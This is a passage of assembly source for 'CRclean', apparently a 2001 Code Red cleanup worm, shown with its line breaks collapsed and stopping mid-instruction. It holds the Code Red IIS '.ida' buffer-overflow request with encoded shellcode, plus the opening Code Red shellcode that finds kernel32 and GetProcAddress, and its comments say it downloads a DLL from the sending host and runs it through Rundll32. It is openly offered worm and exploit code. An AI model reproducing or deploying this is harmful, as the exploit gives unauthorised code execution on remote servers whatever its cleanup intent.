;; Crclean.asm; by Markus Kern <markus-kern@gmx.net>; 06.08.2001;; downloads CRclean.dll from sender and executes it using Rundll32.exe; then calls ExitProcess () on success or sleeps forever on Failure;. 386p. Model Flat. Codeassume Fs:nothingdb ' Get/default.ida?---this-is-crclean---code-red-cleanup-worm-'DB '--check-your-wwwroot-for-crclean.dll---it-contains-zipped-so 'DB ' Urce---this-worm-does-not-spread-actively---if-you-see-this-'db ' the-destination-host-is-infected-with-code-red--------------'db '-%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685 'db ' 8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f 'db ' F%u0078%u0000%u00=a http/1.0 ', 0dh,0ahdb ' Content-type:text/xml ', 0Ahdb ' content-length:0988 ', 0dh,0ah,0dh,0ah; execution starts with slightly modified code Red v1 code; finds GetProcAddress and Kernel32.dll basePush EBPmov ebp, espSub ESP, 218hpush EBXpush ESIPush EDILea EDI, [ebp-218h]mov ecx, 86hmov eax, 0CCCCCCCChRep Stosdmov [ebp-190h], DWORD ptr 0Lea EDI, [ebp-110h]mov eax, dword ptr fs:0mov [edi+8], eaxmov dword ptr fs:0, EDImov dword ptr [ebp-110h], 0FFFFFFFFhmov dword ptr [ebp-1a8h],77e00000hrva_1:cmp DWORD ptr [ebp-190h],